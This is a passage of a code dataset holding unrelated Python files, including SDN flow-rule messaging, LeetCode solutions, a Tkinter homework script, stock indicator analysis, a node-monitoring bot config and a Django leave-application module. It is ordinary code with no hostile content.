path_node in path_nodes:\n if path_node['switch_id'] == dst_switch:\n input_port = int(path_node['port_no'])\n\n if not input_port:\n raise ValueError('Input port was not found for egress flow rule',\n \"path={}\".format(path_nodes))\n\n flow = Flow()\n flow.command = \"install_egress_flow\"\n flow.transaction_id = 0\n flow.flowid = flow_id\n flow.cookie = cookie\n flow.switch_id = dst_switch\n flow.input_port = input_port\n flow.output_port = dst_port\n flow.transit_vlan_id = transit_vlan\n flow.output_vlan_id = dst_vlan\n flow.output_vlan_type = output_action\n\n return flow\n\n\ndef build_intermediate_flows(switch, match, action, vlan, flow_id, cookie):\n # output action is always NONE for transit vlan id\n\n flow = Flow()\n flow.command = \"install_transit_flow\"\n flow.transaction_id = 0\n flow.flowid = flow_id\n flow.cookie = cookie\n flow.switch_id = switch\n flow.input_port = match\n flow.output_port = action\n flow.transit_vlan_id = vlan\n\n return flow\n\n\ndef build_one_switch_flow(switch, src_port, src_vlan, dst_port, dst_vlan,\n bandwidth, flow_id, output_action, cookie,\n meter_id):\n flow = Flow()\n flow.command = \"install_one_switch_flow\"\n flow.transaction_id = 0\n flow.flowid = flow_id\n flow.cookie = cookie\n flow.switch_id = switch\n flow.input_port = src_port\n flow.output_port = dst_port\n flow.input_vlan_id = src_vlan\n flow.output_vlan_id = dst_vlan\n flow.output_vlan_type = output_action\n flow.bandwidth = bandwidth\n flow.meter_id = meter_id\n\n return flow\n\n\ndef build_delete_flow(switch, flow_id, cookie, meter_id=0):\n flow = Flow()\n flow.command = \"delete_flow\"\n flow.transaction_id = 0\n flow.flowid = flow_id\n flow.cookie = cookie\n flow.switch_id = switch\n flow.meter_id = meter_id\n\n return flow\n\n\nclass Message(object):\n def to_json(self):\n return json.dumps(\n self, default=lambda o: o.__dict__, sort_keys=False, indent=4)\n\n\ndef send_message(payload, correlation_id, message_type, destination=\"WFM\"):\n message = Message()\n message.payload = payload\n message.type = message_type\n message.destination = destination\n message.timestamp = get_timestamp()\n message.correlation_id = correlation_id\n kafka_message = b'{}'.format(message.to_json())\n logger.debug('Send message: topic=%s, message=%s', config.KAFKA_TOPIC,\n kafka_message)\n message_result = producer.send(config.KAFKA_TOPIC, kafka_message)\n message_result.get(timeout=5)\n\n\ndef send_error_message(correlation_id, error_type, error_message,\n error_description, destination=\"WFM\"):\n data = {\"error-type\": error_type,\n \"error-message\": error_message,\n \"error-description\": error_description}\n send_message(data, correlation_id, \"ERROR\", destination)\n\n\ndef send_install_commands(flow_rules, correlation_id):\n for flow_rule in flow_rules:\n send_message(flow_rule, correlation_id, \"COMMAND\")\n\n\ndef send_delete_commands(nodes, flow_id, correlation_id, cookie):\n for node in nodes:\n data = build_delete_flow(str(node['switch_id']), str(flow_id), cookie)\n send_message(data, correlation_id, \"COMMAND\")\n","sub_path":"services/topology-engine/queue-engine/topologylistener/message_utils.py","file_name":"message_utils.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"354776629","text":"from typing import List\n\n\nclass Solution:\n def containsDuplicate(self, nums: List[int]) -> bool:\n return sets(nums)\n # return sort(nums)\n\n\ndef sets(nums: List[int]) -> bool:\n # 136 ms\t19.2 MB\n if len(nums) <= 1:\n return False\n\n unique = set()\n for _, num in enumerate(nums):\n if num in unique:\n return True\n unique.add(num)\n return False\n\n\ndef sort(nums: List[int]) -> bool:\n # 124 ms\t19.1 MB\n length = len(nums)\n if length <= 1:\n return False\n\n nums = sorted(nums)\n prev = nums[0]\n for i in range(1, length):\n if prev == nums[i]:\n return True\n prev = nums[i]\n return False\n","sub_path":"python/217.py","file_name":"217.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"533553858","text":"'''HW4 Part D1\n Author: Bianca Yang\n This module uses the draw_square function to draw four different colored\n squares in the corners of an 800x800 canvas.'''\n \nfrom Tkinter import * \n\ndef draw_square(canvas, color, size, center):\n '''Draws a square of the given size and color on the given canvas at\n the given coordinates.'''\n corner1 = (center[0]-size/2, center[1]-size/2)\n corner2 = (center[0]+size/2, center[1]+size/2)\n canvas.create_rectangle(corner1[0], corner1[1], corner2[0], \\\n corner2[1], fill=color, outline=color)\n\n if __name__ == '__main__':\n root = Tk()\n root.geometry('800x800')\n c = Canvas(root, width=800, height=800)\n c.pack()\n draw_square(c, 'red', 100, (50, 50))\n draw_square(c, 'blue', 100, (50, 750))\n draw_square(c, 'green', 100, (750, 50))\n draw_square(c, 'yellow', 100, (750, 750)) \n root.mainloop()\n","sub_path":"lab4_d2.py","file_name":"lab4_d2.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"82389613","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime, timedelta\n\nimport SpectralAnalysis \n\nimport base\nimport simple_indices.RSI\nimport simple_indices.KD\nimport simple_indices.MACD\n\nimport validate.validate\nimport strategy.KD_simple\nimport strategy.MACD_simple\n\nimport argparse\nimport matplotlib.transforms as transforms\n\nparser = argparse.ArgumentParser(description='Simple analysis of a given stock tick symbol.')\nparser.add_argument('--symbol', type=str, help=\"Symbol of the stock\", required=True) \nparser.add_argument('--database', type=str, help=\"Folder name of the database (in the folder `database`)\", required=True) \nparser.add_argument('--window', type=int, help=\"Window in days\", default=365*3-1) \nparser.add_argument('--begin', type=str, help=\"Date of begin\", default=\"\") \nparser.add_argument('--end', type=str, help=\"Date of end\", default=base.d2s(base.today00am())) \nargs = parser.parse_args()\n\ntarget_ticker = args.symbol\ndatabase = \"database/%s\" % args.database\n\nwindow_days = args.window\n\ninput_file = \"%s/%s.csv\" % (database, target_ticker)\n\nprint(\"Target ticker: %s\" % (target_ticker,))\n\n\ndf = pd.read_csv(input_file)\n\nend_date = base.s2d(args.end)\n\nif args.begin == \"\":\n print(\"Use --window\")\n beg_date = end_date - timedelta(days=window_days)\nelse:\n print(\"Use --begin\")\n beg_date = base.s2d(args.begin)\n\n\nprint(\"Selection beg date: %s\" % (base.d2s(beg_date),))\nprint(\"Selection end date: %s\" % (base.d2s(end_date),))\n\ndf = df.loc[(df[\"Date\"] >= base.d2s(beg_date)) & (df[\"Date\"] <= base.d2s(end_date))]\n\nlow_prices = df['Low'].to_numpy()\nhigh_prices = df['High'].to_numpy()\nclose_prices = df['Close'].to_numpy()\n\ndates = df['Date'].to_numpy()\n\ntimestamps = np.array([base.s2d(dates[i]).timestamp() for i in range(len(dates))])\n\nrsi = simple_indices.RSI.calRSI(close_prices, 14)\nK, D = simple_indices.KD.calKD(close_prices, high_prices, low_prices)\n\nMACD, SIG, EMA_fast, EMA_slow = simple_indices.MACD.calMACD(close_prices, w=2)\n\n#strategy = strategy.KD_simple.strategy_KD_simple()\nstrategy = strategy.MACD_simple.strategy_MACD_simple()\nprofit, transactions = validate.validate.validate_single_share(timestamps, close_prices, high_prices, low_prices, 60, strategy)\n\nprint(\"Profit: %.2f\" % (profit, ))\n\ninterp_timestamps, interp_dates = base.fill_date(beg_date, end_date)\n\nif len(interp_dates) % 2 != 0:\n interp_dates = interp_dates[1:]\n interp_timestamps = interp_timestamps[1:]\n\ninterp_close_prices = base.fill_data(interp_timestamps, timestamps, close_prices)\ninterp_low_prices = base.fill_data(interp_timestamps, timestamps, low_prices)\ninterp_high_prices = base.fill_data(interp_timestamps, timestamps, high_prices)\ninterp_rsi = base.fill_data(interp_timestamps, timestamps, rsi)\ninterp_K = base.fill_data(interp_timestamps, timestamps, K)\ninterp_D = base.fill_data(interp_timestamps, timestamps, D)\n\n\nif np.any(np.isnan(interp_close_prices)):\n raise Exception()\n\n# trend\n\nprice_ma = base.mavg(interp_close_prices, 91, method=\"center\") \nprices_anomaly = interp_close_prices - price_ma\ncoe = np.polyfit(interp_timestamps, prices_anomaly, deg=1)\nprices_detrended = prices_anomaly - (interp_timestamps * coe[0] + coe[1])\n\nvolatility = base.volatility(prices_detrended, 11, method=\"center\")\nvolatility_max = base.volatility_max(prices_detrended, 11, method=\"center\")\n\n# spectral\n\nlowpass_days = 30.0\n\ntruncate_wavenumber = int(np.ceil(len(prices_detrended)/lowpass_days))\n\ndata_filtered, pred, _, _ = SpectralAnalysis.DFT_filter(\n prices_detrended,\n truncate_wavenumber = truncate_wavenumber,\n)\n\nimport prediction.cyclic_1 as p_cyc1\n\n# predict\npred_N = 60\n\npred_dates = [ interp_dates[-1] + timedelta(days=i+1) for i in range(pred_N) ]\n\nprices_predicted, uncertainty = p_cyc1.predict(data_filtered, pred_N, n_per_cycle=60)\n\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as transforms\nimport matplotlib.dates as mdates\n\nplt.rcParams[\"date.autoformatter.month\"] = \"%y-%m-%d\"\n\nfig, ax = plt.subplots(5, 1, sharex=True, figsize=(12, 8))\n\nt = interp_dates\nt_raw = np.array([datetime.fromtimestamp(timestamps[i]) for i in range(len(timestamps))])\n\ntrans = transforms.blended_transform_factory(ax[0].transData, ax[0].transAxes)\nfor i in range(len(transactions) // 2):\n \n _buy = transactions[i*2]\n _sell = transactions[i*2+1]\n _profit = _sell.amount - _buy.amount\n\n if _profit > 0:\n color = \"green\"\n else:\n color = \"red\"\n\n ax[0].fill_between([datetime.fromtimestamp(_buy.time), datetime.fromtimestamp(_sell.time)], [0, 0], [1, 1], facecolor=color, alpha=0.2, transform=trans)\n\nfor transaction in transactions:\n marker = \"o\" if transaction.action == \"buy\" else \"x\"\n ax[0].scatter(datetime.fromtimestamp(transaction.time), transaction.amount, s=20, edgecolors=\"k\", facecolor=\"k\", marker=marker, zorder=99)\n #print(datetime.fromtimestamp(transaction.time), \": \", transaction.amount)\n\n\n\n\nax[0].fill_between(t, interp_low_prices, interp_high_prices, facecolor=\"#aaaaaa\", )\nax[0].plot(t, interp_close_prices, color=\"black\", linewidth=1)\nax[0].plot(t, price_ma, color=\"blue\", linestyle=\"dashed\", linewidth=1)\n\n\n\n#ax[1].fill_between(t, fluct_min, fluct_max, facecolor=\"#dddd55\", )\nax[1].fill_between(t, - volatility_max, volatility_max, facecolor=\"#dddd55\", )\nax[1].fill_between(t, - volatility, volatility, facecolor=\"#aaaa55\", )\nax[1].fill_between(t, interp_low_prices - price_ma, interp_high_prices - price_ma, facecolor=\"#aaaaaa\", )\nax[1].plot(t, prices_detrended, color=\"black\", linewidth=1)\nax[1].plot(t, data_filtered, color=\"red\", linewidth=1)\nax[1].plot(t, interp_timestamps * coe[0] + coe[1], color=\"green\", linewidth=1)\n\n\ntrans = transforms.blended_transform_factory(ax[2].transAxes, ax[2].transData)\nax[2].fill_between([0, 1], [30, 30], [70, 70], facecolor=\"#ffff88\", alpha=0.8, transform=trans)\nax[2].plot(t, interp_rsi, color=\"black\", linewidth=1)\n\nax[3].plot(t, interp_K, color=\"blue\", markersize=10, linewidth=1)\nax[3].plot(t, interp_D, color=\"red\", linewidth=1)\n\n\n\nDIF = MACD - SIG\ntwin = ax[4].twinx()\n#twin.bar(t_raw[pos_mask], MACD[pos_mask], color=\"green\", alpha=0.5)\n#twin.bar(t_raw[neg_mask], MACD[neg_mask], color=\"red\", alpha=0.5)\ntwin.fill_between(t_raw, DIF, where = DIF > 0, color=\"green\", alpha=0.5)\ntwin.fill_between(t_raw, DIF, where = DIF <= 0, color=\"red\", alpha=0.5)\n\n\nax[4].plot(t_raw, MACD, color=\"red\", linewidth=1)\nax[4].plot(t_raw, SIG, color=\"blue\", linewidth=1)\n#twin.plot(t_raw, EMA_fast - EMA_slow, color=\"gray\", linewidth=1)\n\n\n\nax[0].set_title(\"Ticker : %s (%s ~ %s)\" % (target_ticker, base.d2s(beg_date), base.d2s(end_date)))\nax[1].set_title(\"Detrended\")\nax[2].set_title(\"RSI\")\nax[3].set_title(\"KD\")\nax[4].set_title(\"MACD\")\n\n\nax[1].plot(pred_dates, prices_predicted, color=\"blue\", linestyle=\"dashed\", linewidth=1)\n\ntime_ticks = []\ntime_newyear_ticks = []\nfor y in range(beg_date.year, end_date.year + 1):\n\n time_ticks.extend([\n datetime(y, 1, 1),\n datetime(y, 4, 1),\n datetime(y, 7, 1),\n datetime(y, 10, 1),\n ])\n\n time_newyear_ticks.append(datetime(y, 1, 1))\n\n\nmyFmt = mdates.DateFormatter(\"%m/%d\")\nfor _ax in ax:\n _ax.set_xticks(time_ticks)\n _ax.xaxis.set_major_formatter(myFmt)\n _ax.grid(alpha=0.5)\n _ax.set_xlim([beg_date, pred_dates[-1] + timedelta(days=10)])\n _ax.set_xlabel(\"Date\")\n _ax.set_ylabel(\"Price\")\n\n trans = transforms.blended_transform_factory(_ax.transData, _ax.transAxes)\n for time_newyear_tick in time_newyear_ticks:\n _ax.text(time_newyear_tick, 0.95, \"%d\" % (time_newyear_tick.year,) , size=10, va=\"top\", ha=\"center\", transform=trans)\n\n\nplt.show()\n","sub_path":"lab/analysis_one_ticker.py","file_name":"analysis_one_ticker.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"421869673","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Bot config\nBotAPIKey = 'xxx' # API Keythat you get from @BotFather\ntg = xxx # Your id, you can get it by sending command /id to bot @TONTgIDBot\nserverbotpath = '/home//serverbot' # User folder with this bot.\nserverbotpathdb = '/home//serverbot/db' # User folder with bot database. \nsrvping = '1.1.1.1' # Ping test server\ntraceroutetest = '1.1.1.1' # Traceroute test server\n\n# Server config \nmemloadalarm = 90 # RAM Utilization alarm starts at\npingcalarm = 50 # When ping will be more than X ms, you will get alarm.\ncpuutilalarm = 99 # CPU Utilization alarm starts at\nrepeattimealarmsrv = [5,15,25,30,60,90,120,180,320, 640, 1280, 2560, 5120, 10240, 20480, 40960, 81920] # Notify every x second about high CPU, RAM load and ping\ncfgAlertsNotificationsRam = 1 # RAM Monitoring + history\ncfgAlertsNotificationsCPU = 1 # CPU Monitoring + history\ncfgAlertsNotificationsping = 1 # RAM, Ping & CPU Monitopring\ncfgmonitoringnetwork = 1 # Netowrk Monitopring\ncfgmonitoringdiskio = 1 # Disk I/O Monitopring\n\n# Near config\nnearnetwork = 'betanet' # Choose your network - betanet/testnet/mainnet/guildnet\npoolname = 'xxx' # Your pool name\nsyncalarm = 50 # Blocks diff for alarm\nblocksdiff = 10 # Blocks produced VS expected alarm\nrepeattimealarmnode = [5,15,25,30,60,90,120,180,320, 640, 1280, 2560, 5120, 10240, 20480, 40960, 81920] # Notify every x second about validator node issues\ncfgAlertsNotificationsNode = 1 # Node pid monitoring\ncfgAlertsNotificationsSync = 1 # Sync status monitoring\ncfgAlertsNotificationsBlocks = 1 # Blocks produced VS expected monitoring\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"475627177","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@File : test_collection.py\n@Time : 2021/6/20 9:06\n\"\"\"\nimport pytest\nfrom common.mainTest import BaseRequests as R\nfrom tests.test_project_01 import *\n\n\n# from config.setting import *\n\n\n@pytest.mark.datafile(yaml_dir + 'test_demo.yaml')\ndef test_(parameters: dict):\n url = TEST_HOST + parameters.pop(\"url\")\n method = parameters.pop(\"method\")\n case_desc = parameters.pop(\"case_desc\")\n variables = parameters.pop('jsonpath_exp')\n verification = parameters.pop('verification')\n R.send_request(method, url, case_desc=case_desc, verification=verification, jsonpath_exp=variables, **parameters)\n\n\nif __name__ == '__main__':\n pytest.main(['-s', '-k', 'test_.py'])\n","sub_path":"apitest/tests/test_project_01/test/test_.py","file_name":"test_.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"644861801","text":"from terminaltables import SingleTable\n\n\nclass Border:\n\tdef __init__(self, w, h, title='Game board'):\n\t\tself.w = w\n\t\tself.h = h\n\t\tself.title = title\n\t\tself.m = [['']*(w+1) for i in range(h+1)]\n\t\tself.createIndexies()\n\t\n\tdef createIndexies(self):\n\t\tfor i in range(self.w):\n\t\t\tself.m[0][1+i] = chr(ord('A')+i)\n\t\t\tself.m[1+i][0] = i + 1\n\t\n\tdef draw(self):\n\t\tt = SingleTable(self.m, self.title)\n\t\tt.outer_border = True\n\t\tt.inner_row_border = True\n\t\tt.inner_column_border = True\n\t\tprint(t.table)\n\t\n\tdef set(self, cs, val):\n\t\tcs = cs.upper()\n\t\tx = ord(cs[0]) - ord('A') + 1\n\t\ty = int(cs[1:])\n\t\tself.m[y][x] = val\n\t\t\n\ndef main():\n\ttd = [\n\t[' ', 'A', 'B', 'C'],\n\t['1', 'X', ' ', 'O'],\n\t['2', 'O', 'X', ' '],\n\t['3', 'O', ' ', 'X']\n\t]\n\t\n\tt = SingleTable(td, 'GameBoard')\n\tt.outer_border = False\n\tt.inner_row_border = True\n\tt.inner_column_border = True\n\t\n\tprint(t.table)\n\t\n\tb = Border(5, 5)\n\tb.draw()\n\tb.set('a1', 'x')\n\tb.set('d4', 'o')\n\tb.draw()\n\t\n\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"archive/06.06.19 4:10/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"197184072","text":"slownik = {\n \"jeden\": \"I\",\n \"dwa\": \"II\",\n \"trzy\": \"III\",\n \"cztery\": \"IV\",\n \"piec\": \"V\",\n \"szesc\": \"VI\",\n \"siedem\": \"VII\",\n \"osiem\": \"VIII\",\n \"dziewiec\": \"IX\",\n \"dziesiec\": \"X\"\n}\n \nfor x, y in slownik.items():\n print(x, y)","sub_path":"zad15.py","file_name":"zad15.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"399234251","text":"def judge_anagram(str1 , str2):\n list_str1 = [char for char in str1]\n list_str2 = [char for char in str2]\n '''\n list_str1.sort\n list_str2.sort\n print(list_str1)\n print(list_str2)\n '''\n if sorted(list_str1) == sorted(list_str2):\n return True\n else:\n return False\n\nif __name__ == \"__main__\":\n print(judge_anagram(\"hoge\",\"geho\"))\n\n","sub_path":"Chapter1/module/judge_anagram.py","file_name":"judge_anagram.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"101711788","text":"from django.urls import path\nfrom curriculo import views\n\napp_name = 'curriculo'\n\nurlpatterns = [\n path('/', views.curso, name=\"curso\"),\n path('/disciplina//', views.disciplina, name=\"disciplina\")\n\n\n\n\n] ","sub_path":"curriculo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"469448036","text":"class Solution:\n def sortedSquares(self, nums: List[int]) -> List[int]:\n n = len(nums)\n res = [0] * n\n left, right = 0, n - 1\n\n while (right - left >= 0):\n if (abs(nums[left]) > abs(nums[right])):\n res[right - left] = nums[left] ** 2\n left += 1\n else:\n res[right - left] = nums[right] ** 2\n right -= 1\n\n return res\n\n # n = len(nums)\n\n # res = []\n\n # iOfNumClosestToZero = 0\n\n # i = 1\n # while (i < n and abs(nums[i]) <= abs(nums[i-1])):\n # iOfNumClosestToZero = i\n # i += 1\n\n # res.append(nums[iOfNumClosestToZero] ** 2)\n # left = iOfNumClosestToZero - 1\n # right = iOfNumClosestToZero + 1\n\n # for _ in range(n - 1):\n # if (left < 0):\n # res.append(nums[right] ** 2)\n # right += 1\n # elif (right > n - 1):\n # res.append(nums[left] ** 2)\n # left -= 1\n # else:\n # if (abs(nums[left]) > abs(nums[right])):\n # res.append(nums[right] ** 2)\n # right += 1\n # else:\n # res.append(nums[left] ** 2)\n # left -= 1\n\n # return res\n","sub_path":"LeetCode/977. Squares of a Sorted Array.py","file_name":"977. Squares of a Sorted Array.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"52087363","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import View\nfrom django.http import HttpResponse, Http404, JsonResponse\nfrom leave_application.forms import (FacultyLeaveForm,\n StaffLeaveForm,\n StudentLeaveForm,)\n\nfrom user_app.models import Administration, Replacement, ExtraInfo\nfrom leave_application.models import (Leave, CurrentLeaveRequest,\n LeaveRequest, LeavesCount,\n LeaveMigration,)\nfrom django.contrib.auth.models import User\n\nfrom eis.views import render_to_pdf\n\nfrom leave_application.helpers import FormData, get_object_or_none, count_work_days\nfrom django.db.models import Q\nfrom django.db import transaction\nimport datetime\nimport json\nfrom django.contrib.auth.decorators import login_required\n\n\nclass LeaveView(View):\n\n def get(self, request):\n cake = request.GET.get('cake')\n curr_year = datetime.date.today().year\n if not cake:\n leaves_count = LeavesCount.objects.get(user=request.user, year=curr_year)\n applications = GetApplications.get_reps(request)\n message = request.GET.get('message', None)\n leave_id = request.GET.get('leave_id', None)\n form = ApplyLeave.get_form(request) if not message else None\n received_requests = GetApplications.get_count(request)\n context = {\n 'form': form,\n 'leaves_count': leaves_count,\n 'message': message,\n 'show_approve': received_requests,\n 'leave_id': leave_id\n }\n context.update(applications)\n return render(request, 'fusion/leaveModule0/leave.html', context)\n\n elif cake == 'form':\n form = ApplyLeave.get_form(request)\n leaves_count = LeavesCount.objects.get(user=request.user, year=curr_year)\n context = {\n 'form': form,\n 'leaves_count': leaves_count,\n }\n return render(request, 'fusion/leaveModule0/leaveapplicationform.html', context)\n\n elif cake == 'status':\n user_leaves = Leave.objects.filter(applicant=request.user)\n\n context = {\n 'user_leaves': user_leaves\n }\n\n return render(request, 'fusion/leaveModule0/leavestatus.html', context)\n\n elif cake == 'approve':\n context = GetApplications.get_to_approve(request)\n return render(request, 'fusion/leaveModule0/leaveapprove.html', context)\n\n elif cake == 'detail':\n pk = request.GET.get('pk')\n leave = Leave.objects.get(pk=pk)\n\n return render(request, 'fusion/leaveModule0/details.html', {'leave': leave})\n\n else:\n return HttpResponse('You can\\'t see this page.')\n\nclass ApplyLeave(View):\n \"\"\"\n A Class Based View which handles user applying for leave\n \"\"\"\n def get(self, request):\n \"\"\"\n view to handle get request to /leave/apply\n \"\"\"\n # TODO: Check if leave not rejected or accepted and leave instance belongs to user\n # TODO: Take another value as action so that action can specify edit or delete with same\n return redirect('/leave/')\n\n def post(self, request):\n \"\"\"\n view to handle post request to /leave/apply\n \"\"\"\n form = ApplyLeave.get_form(request)\n if form.is_valid():\n type_of_leave = form.cleaned_data.get('type_of_leave', 'casual')\n acad_done = False if form.cleaned_data.get('acad_rep', False) else True\n admin_done = False if form.cleaned_data.get('admin_rep', False) else True\n academic_replacement = get_object_or_none(User, username=form.cleaned_data.get('acad_rep'))\n administrative_replacement = get_object_or_none(User,\n username=form.cleaned_data.get('admin_rep'))\n try:\n leave_obj = Leave.objects.create(\n applicant = request.user,\n type_of_leave = type_of_leave,\n academic_replacement = academic_replacement,\n administrative_replacement = administrative_replacement,\n purpose = form.cleaned_data['purpose'],\n acad_done = acad_done,\n admin_done = admin_done,\n leave_address = form.cleaned_data.get('leave_address', ''),\n start_date = form.cleaned_data['start_date'],\n station_start_date = form.cleaned_data.get('station_start_date'),\n station_end_date = form.cleaned_data.get('station_end_date'),\n end_date = form.cleaned_data['end_date'],\n station = form.cleaned_data.get('station_leave'),\n )\n\n except Exception as e:\n return render(request,\n 'leave_application/apply_for_leave.html',\n {'form': form, 'message': 'Failed'})\n\n return redirect('/leave/?message=success&leave_id={}'.format(leave_obj.id))\n\n else:\n context = {'form': form, 'title': 'Leave', 'action':'Apply'}\n year = datetime.date.today().year\n leaves_count = LeavesCount.objects.get(user=request.user, year=year)\n context['leaves_count'] = leaves_count\n context.update(GetApplications.get_reps(request))\n return render(request, 'fusion/leaveModule0/leave.html', context)\n\n @classmethod\n def get_user_type(cls, request):\n return request.user.extrainfo.user_type\n\n @classmethod\n def get_form(cls, request):\n\n user_type = cls.get_user_type(request)\n\n if user_type == 'faculty':\n form = cls.get_form_object(FacultyLeaveForm, request)\n elif user_type == 'staff':\n form = cls.get_form_object(StaffLeaveForm, request)\n else:\n form = cls.get_form_object(StudentLeaveForm, request)\n\n return form\n\n @classmethod\n def get_form_object(ccls, cls, request):\n\n if request.method == 'GET':\n return cls(initial={}, user=request.user)\n else:\n return cls(request.POST, user=request.user)\n\n\nclass ProcessRequest(View):\n\n def post(self, request, id):\n leave_request = get_object_or_404(CurrentLeaveRequest, id=id)\n\n do = request.POST.get('do')\n\n response = JsonResponse({'response': 'Failed'}, status=400)\n\n rep_user = get_object_or_none(Replacement, replacee=leave_request.requested_from,\n replacement_type='administrative')\n if rep_user:\n rep_user = rep_user.replacer\n\n if request.user in [leave_request.requested_from, rep_user] \\\n and do in ['accept', 'reject', 'forward']:\n\n response = getattr(self, do)(request, leave_request) or response\n\n return response\n\n\n def accept(self, request, leave_request):\n type_of_leave = leave_request.leave.type_of_leave\n sanc_auth = leave_request.applicant.extrainfo.sanctioning_authority\n sanc_officer = leave_request.applicant.extrainfo.sanctioning_officer\n remark = request.POST.get('remark', '')\n response = JsonResponse({'response': 'ok'}, status=200)\n\n if leave_request.permission in ['academic', 'admin']:\n\n if leave_request.permission == 'academic':\n leave_request.leave.acad_done = True\n else:\n leave_request.leave.admin_done = True\n\n leave_request.leave.save()\n leave_request = self.create_leave_request(leave_request, False, accept=True, remark=remark)\n\n if leave_request.leave.replacement_confirm and leave_request.leave.status == 'processing':\n position = leave_request.applicant.extrainfo.sanctioning_authority\n next_user = ExtraInfo.objects.filter(designation=position).first().user\n CurrentLeaveRequest.objects.create(\n applicant = leave_request.applicant,\n requested_from = next_user,\n permission = 'sanc_auth',\n position = position,\n leave = leave_request.leave,\n )\n\n elif sanc_auth == sanc_officer or leave_request.permission == 'sanc_officer':\n leave_request = self.create_leave_request(leave_request, True, accept=True, remark=remark)\n leave_request.leave.status = 'accepted'\n leave_request.leave.save()\n\n elif leave_request.permission == 'sanc_auth':\n if type_of_leave in ['casual', 'restricted']:\n leave_request = self.create_leave_request(leave_request, True, accept=True, remark=remark)\n else:\n response = None\n\n return response\n\n def reject(self, request, leave_request):\n remark = request.POST.get('remark', '')\n\n type_of_leave = leave_request.leave.type_of_leave\n response = JsonResponse({'response': 'ok',}, status=200)\n sanc_auth = leave_request.applicant.extrainfo.sanctioning_authority\n sanc_officer = leave_request.applicant.extrainfo.sanctioning_officer\n\n condition = sanc_officer == sanc_auth\n\n if not leave_request.leave.replacement_confirm or leave_request.permission == 'sanc_officer' \\\n or condition:\n leave_request = self.create_leave_request(leave_request, True, accept=False, remark=remark)\n list(map(lambda x: x.delete(), leave_request.leave.cur_requests.all()))\n\n elif leave_request.permission == 'sanc_auth':\n if type_of_leave in ['casual', 'restricted']:\n leave_request = self.create_leave_request(leave_request, True, accept=False, remark=remark)\n else:\n response = None\n else:\n response = None\n return response\n\n def forward(self, request, leave_request):\n\n remark = request.POST.get('remark', '')\n type_of_leave = leave_request.leave.type_of_leave\n\n response = JsonResponse({'response': 'ok',}, status=200)\n\n if leave_request.permission == 'sanc_auth' and \\\n type_of_leave not in ['casual', 'restricted']:\n\n leave_request = self.create_leave_request(leave_request, False, accept=False, remark=remark)\n\n if leave_request.leave.status == 'processing':\n position = leave_request.applicant.extrainfo.sanctioning_officer\n\n next_user = ExtraInfo.objects.filter(designation=position).first().user\n\n CurrentLeaveRequest.objects.create(\n applicant = leave_request.applicant,\n requested_from = next_user,\n position = position,\n leave = leave_request.leave,\n permission = 'sanc_officer',\n )\n else:\n response = None\n\n return response\n\n\n\n @transaction.atomic\n def create_leave_request(self, cur_leave_request, final, accept=False, remark=''):\n if cur_leave_request.leave.type_of_leave not in ['casual', 'restricted'] and \\\n cur_leave_request.permission == 'sanc_auth':\n status = True\n else:\n status = accept\n\n leave_request = LeaveRequest.objects.create(\n leave = cur_leave_request.leave,\n applicant = cur_leave_request.applicant,\n requested_from = cur_leave_request.requested_from,\n remark = remark,\n permission = cur_leave_request.permission,\n position = cur_leave_request.position,\n status = status,\n )\n\n if not accept and final:\n cur_leave_request.leave.status = 'rejected'\n elif final:\n curr_year = datetime.date.today().year\n start_date = cur_leave_request.leave.start_date\n end_date = cur_leave_request.leave.end_date\n if curr_year == start_date.year and curr_year == end_date.year:\n count = LeavesCount.objects.get(user=cur_leave_request.applicant, year=curr_year)\n\n remain = getattr(count, cur_leave_request.leave.type_of_leave)\n required_leaves = cur_leave_request.leave.count_work_days\n\n if remain < required_leaves:\n cur_leave_request.leave.status = 'rejected'\n else:\n setattr(count, cur_leave_request.leave.type_of_leave,\n remain - required_leaves)\n count.save()\n self.create_migration(cur_leave_request.leave)\n cur_leave_request.leave.status = 'accepted'\n elif curr_year == start_date.year and end_date.year == curr_year + 1:\n final_date = datetime.date(curr_year, 12, 31)\n\n days_in_curr_year = count_work_days(start_date, final_date)\n final_date += datetime.timedelta(days=1)\n days_in_next_year = count_work_days(final_date, end_date)\n curr_count = LeavesCount.objects.get(user=cur_leave_request.applicant,\n year=start_date.year)\n next_count = LeavesCount.objects.get(user=cur_leave_request.applicant,\n year=end_date.year)\n\n curr_remaining = getattr(curr_count, cur_leave_request.leave.type_of_leave)\n next_remaining = getattr(next_count, cur_leave_request.leave.type_of_leave)\n\n if curr_remaining >= days_in_curr_year and next_remaining >= days_in_next_year:\n setattr(curr_count, cur_leave_request.leave.type_of_leave,\n curr_remaining - days_in_curr_year)\n curr_count.save()\n 